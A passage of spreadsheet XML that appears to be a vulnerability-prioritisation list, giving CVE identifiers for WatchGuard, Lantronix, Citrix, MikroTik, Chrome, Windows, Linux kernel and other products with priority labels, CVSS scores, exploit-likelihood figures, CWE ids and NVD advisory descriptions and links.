        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-14733</t>
        </is>
      </c>
      <c r="C8" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F8" s="5" t="n">
        <v>0.265</v>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr">
        <is>
          <t>watchguard:firebox_m270, watchguard:firebox_m290, watchguard:firebox_m295, watchguard:firebox_m370, watchguard:firebox_m390, watchguard:firebox_m395, watchguard:firebox_m440, watchguard:firebox_m4600, watchguard:firebox_m470, watchguard:firebox_m4800</t>
        </is>
      </c>
      <c r="I8" s="5" t="inlineStr">
        <is>
          <t>2025-12-19</t>
        </is>
      </c>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>2025-12-26</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr">
        <is>
          <t>An Out-of-bounds Write vulnerability in the WatchGuard Fireware OS iked process may allow a remote unauthenticated attacker to execute arbitrary code. This vulnerability affects both the mobile user VPN with IKEv2 and the branch office VPN using IKEv2 when configured with a dynamic gateway peer.
If the Firebox was previously configured with the mobile user VPN with IKEv2 or a branch office VPN using IKEv2 to a dynamic gateway peer, and both of those configurations have since been deleted, that Firebox may still be vulnerable if a branch office VPN to a static gateway peer is still configured.</t>
        </is>
      </c>
      <c r="M8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-14733</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-67038</t>
        </is>
      </c>
      <c r="C9" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F9" s="5" t="n">
        <v>0.193</v>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr">
        <is>
          <t>lantronix:e213f102s, lantronix:e213f102s_firmware, lantronix:e214f002s, lantronix:e214f002s_firmware, lantronix:e214f00cs, lantronix:e214f00cs_firmware, lantronix:e214g000s, lantronix:e214g000s_firmware, lantronix:e214g001s, lantronix:e214g001s_firmware</t>
        </is>
      </c>
      <c r="I9" s="5" t="inlineStr">
        <is>
          <t>2026-03-11</t>
        </is>
      </c>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>2026-06-26</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L9" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Lantronix EDS5000 2.1.0.0R3. The HTTP RPC module executes a shell command to write logs when user's authentication fails. The username is directly concatenated with the command without any sanitization. This allow attackers to inject arbitrary OS commands into the username parameter. Injected commands are executed with root privileges.</t>
        </is>
      </c>
      <c r="M9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-67038</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19490</t>
        </is>
      </c>
      <c r="C10" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F10" s="5" t="n">
        <v>0.06</v>
      </c>
      <c r="G10" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="H10" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="I10" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in NetScaler ADC and NetScaler Gateway.
This issue affects ADC: from 14.1 through 73.32 and from 13.1 through 63.21; Gateway: from 14.1 through 73.32 and from 13.1 through 63.21.</t>
        </is>
      </c>
      <c r="M10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86060</t>
        </is>
      </c>
      <c r="C11" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F11" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="I11" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L11"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M11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67277</t>
        </is>
      </c>
      <c r="C12" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F12" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="I12" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L12"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M12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85046</t>
        </is>
      </c>
      <c r="C13" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D13" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F13" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr">
        <is>
          <t>google:chrome, google:v8</t>
        </is>
      </c>
      <c r="I13" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L13" s="5" t="inlineStr">
        <is>
          <t>Type confusion in V8 in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85046</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87491</t>
        </is>
      </c>
      <c r="C14" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D14" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F14" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I14" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>2026-09-23</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>CVE-2016-7255</t>
        </is>
      </c>
      <c r="C15" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D15" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F15" s="5" t="n">
        <v>0.8100000000000001</v>
      </c>
      <c r="G15" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H15" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1507, microsoft:windows_10_1511, microsoft:windows_10_1607, microsoft:windows_7, microsoft:windows_8.1, microsoft:windows_rt_8.1, microsoft:windows_server_2008, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_vista</t>
        </is>
      </c>
      <c r="I15" s="5" t="inlineStr">
        <is>
          <t>2016-11-10</t>
        </is>
      </c>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>2022-05-03</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr">
        <is>
          <t>The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability."</t>
        </is>
      </c>
      <c r="M15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2016-7255</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-37969</t>
        </is>
      </c>
      <c r="C16" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D16" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F16" s="5" t="n">
        <v>0.283</v>
      </c>
      <c r="G16" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H16" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1507, microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_20h2, microsoft:windows_10_21h1, microsoft:windows_10_21h2, microsoft:windows_11_21h2, microsoft:windows_7, microsoft:windows_8.1, microsoft:windows_rt_8.1</t>
        </is>
      </c>
      <c r="I16" s="5" t="inlineStr">
        <is>
          <t>2022-09-13</t>
        </is>
      </c>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>2022-10-05</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L16" s="5" t="inlineStr">
        <is>
          <t>Windows Common Log File System Driver Elevation of Privilege Vulnerability</t>
        </is>
      </c>
      <c r="M16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-37969</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-38352</t>
        </is>
      </c>
      <c r="C17" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D17" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F17" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G17" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H17" s="5" t="inlineStr">
        <is>
          <t>debian:debian_linux, linux:linux_kernel</t>
        </is>
      </c>
      <c r="I17" s="5" t="inlineStr">
        <is>
          <t>2025-07-22</t>
        </is>
      </c>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>2025-09-25</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L17" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
posix-cpu-timers: fix race between handle_posix_cpu_timers() and posix_cpu_timer_del()
If an exiting non-autoreaping task has already passed exit_notify() and
calls handle_posix_cpu_timers() from IRQ, it can be reaped by its parent
or debugger right after unlock_task_sighand().
If a concurrent posix_cpu_timer_del() runs at that moment, it won't be
able to detect timer-&gt;it.cpu.firing != 0: cpu_timer_task_rcu() and/or
lock_task_sighand() will fail.
Add the tsk-&gt;exit_state check into run_posix_cpu_timers() to fix this.
This fix is not needed if CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, because
exit_task_work() is called before exit_notify(). But the check still
makes sense, task_work_add(&amp;tsk-&gt;posix_cputimers_work.work) will fail
anyway in this case.</t>
        </is>
      </c>
      <c r="M17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-38352</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31431</t>
        </is>
      </c>
      <c r="C18" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D18" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F18" s="5" t="n">
        <v>0.999</v>
      </c>
      <c r="G18" s="5" t="inlineStr">
        <is>
          <t>linux kernel, ubuntu</t>
        </is>
      </c>
      <c r="H18" s="5" t="inlineStr">
        <is>
          <t>amazon:amazon_linux, arista:cloudvision_agni, arista:cloudvision_portal, arista:netvisor_os, arista:velocloud_edge, arista:velocloud_gateway, arista:velocloud_orchestrator, canonical:ubuntu_linux, debian:debian_linux, linux:linux_kernel</t>
        </is>
      </c>
      <c r="I18" s="5" t="inlineStr">
        <is>
          <t>2026-04-22</t>
        </is>
      </c>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>2026-05-15</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr">
        <is>
          <t>CWE-1288, CWE-669</t>
        </is>
      </c>
      <c r="L18" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: algif_aead - Revert to operating out-of-place
This mostly reverts commit 72548b093ee3 except for the copying of
the associated data.
There is no benefit in operating in-place in algif_aead since the
source and destination come from different mappings.  Get rid of
all the complexity added for in-place operation and just copy the
AD directly.</t>
        </is>
      </c>
      <c r="M18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31431</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81963</t>
        </is>
      </c>
      <c r="C19" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D19" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F19" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G19" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H19" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I19" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-59</t>
        </is>
      </c>
      <c r="L19" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85880</t>
        </is>
      </c>
      <c r="C20" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D20" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F20" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G20" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H20" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t>
        </is>
      </c>
      <c r="I20" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-908</t>
        </is>
      </c>
      <c r="L20" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>CVE-2020-14498</t>
        </is>
      </c>
      <c r="C21" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E21" s="5" t="inlineStr"/>
      <c r="F21" s="5" t="n">
        <v>0.029</v>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr">
        <is>
          <t>hms-networks:ecatcher</t>
        </is>
      </c>
      <c r="I21" s="5" t="inlineStr">
        <is>
          <t>2020-08-26</t>
        </is>
      </c>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-787</t>
        </is>
      </c>
      <c r="L21" s="5" t="inlineStr">
        <is>
          <t>HMS Industrial Networks AB eCatcher all versions prior to 6.5.5 is vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute arbitrary code.</t>
        </is>
      </c>
      <c r="M21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2020-14498</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14560</t>
        </is>
      </c>
      <c r="C22" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E22" s="5" t="inlineStr"/>
      <c r="F22" s="5" t="inlineStr"/>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L22" s="5" t="inlineStr">
        <is>
          <t>The teddy-bear-customize-addon WordPress plugin through 1.0.5 does not properly validate uploaded files, relying on a client-supplied content type and preserving the original filename, allowing unauthenticated attackers to upload arbitrary PHP files and execute code on the server.</t>
        </is>
      </c>
      <c r="M22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14560</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19188</t>
        </is>
      </c>
      <c r="C23" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E23" s="5" t="inlineStr"/>
      <c r="F23" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L23" s="5" t="inlineStr">
        <is>
          <t>A critical OS command injection vulnerability has been identified in the
 Haiwell IoT Cloud HMI Gateway product. The vulnerability exists in the 
Net Check feature accessible via the /setting endpoint. The cmdPing 
Socket.io event fails to properly sanitize user-supplied input before 
passing it to the underlying operating system, allowing an attacker to 
inject and execute arbitrary OS commands with root privileges.</t>
        </is>
      </c>
      <c r="M23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19188</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28659</t>
        </is>
      </c>
      <c r="C24" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E24" s="5" t="inlineStr"/>
      <c r="F24" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L24" s="5" t="inlineStr">
        <is>
          <t>In MicroXR Blobstore, there is a possible way to access other app's files due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28659</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42043</t>
        </is>
      </c>
      <c r="C25" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E25" s="5" t="inlineStr"/>
      <c r="F25" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G25" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H25" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I25" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr">
        <is>
          <t>CWE-183, CWE-441, CWE-918</t>
        </is>
      </c>
      <c r="L25" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, an attacker who can influence the target URL of an Axios request can use any address in the 127.0.0.0/8 range (other than 127.0.0.1) to completely bypass the NO_PROXY protection. This vulnerability is due to an incomplete for CVE-2025-62718, This vulnerability is fixed in 1.15.1 and 0.31.1.</t>
        </is>
      </c>
      <c r="M25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42043</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44756</t>
        </is>
      </c>
      <c r="C26" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E26" s="5" t="inlineStr"/>
      <c r="F26" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L26" s="5" t="inlineStr">
        <is>
          <t>A memory safety vulnerability exists in the Extended Passport Protocol (EPP) processing library. Under specific conditions, an unauthenticated attacker could exploit a crafted network request containing a malformed EPP header, potentially resulting in undefined behavior and abnormal program termination. Successful exploitation may have a high impact on the confidentiality, integrity, and availability of the application.</t>
        </is>
      </c>
      <c r="M26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44756</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45674</t>
        </is>
      </c>
      <c r="C27" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E27" s="5" t="inlineStr"/>
      <c r="F27" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I27" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="L27" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, Netty's DnsResolveContext fails to validate the origin (bailiwick) of CNAME records in DNS responses. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45674</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
